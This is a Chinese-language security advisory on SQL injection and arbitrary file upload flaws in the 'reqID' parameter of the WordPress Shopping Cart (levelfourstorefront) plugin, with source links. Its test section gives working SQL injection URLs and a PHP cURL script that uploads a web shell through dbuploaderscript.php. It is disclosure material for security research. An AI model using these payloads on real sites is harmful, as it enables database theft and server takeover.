发布日期:2012-12-30
更新日期:2013-01-05
受影响系统:
WordPress Shopping Cart 8.1.14
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57101
WordPress Shopping Cart插件是购物车系统,具有电子交易功能和管理工具。
WordPress Shopping Cart插件内存在安全漏洞,没有正确验证wp-content/plugins/levelfourstorefront/scripts/administration/backup.php, wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript.php, wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php, wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php内的 "reqID" 参数值的合法性,可导致任意SQL代码执行和任意文件上传。
<*来源:Sammy Forgit
链接:http://packetstormsecurity.com/files/119217/wplevelfour-sqlshell.txt
http://www.securelist.com/en/advisories/51690
http://www.opensyscom.fr/Actualites/wordpress-plugins-wordpress-shopping-cart-multiple-vulnerability.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
## Exploit SQL injection :
Database WordPress :
http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID=1' or 1='1
Account XLS :
http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php?reqID=1' or 1='1
Subscriber XLS :
http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1
## Exploit Arbitrary File Upload:
PostShell.php
<?php
$uploadfile = "lo.php";
$force = "http://localhost/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/dbuploaderscript.php";
$ch = curl_init("$force");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'reqID'=>"1'or 1='1"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$postResult = curl_exec( $ch );
curl_close($ch);
print "$postResult";
?>
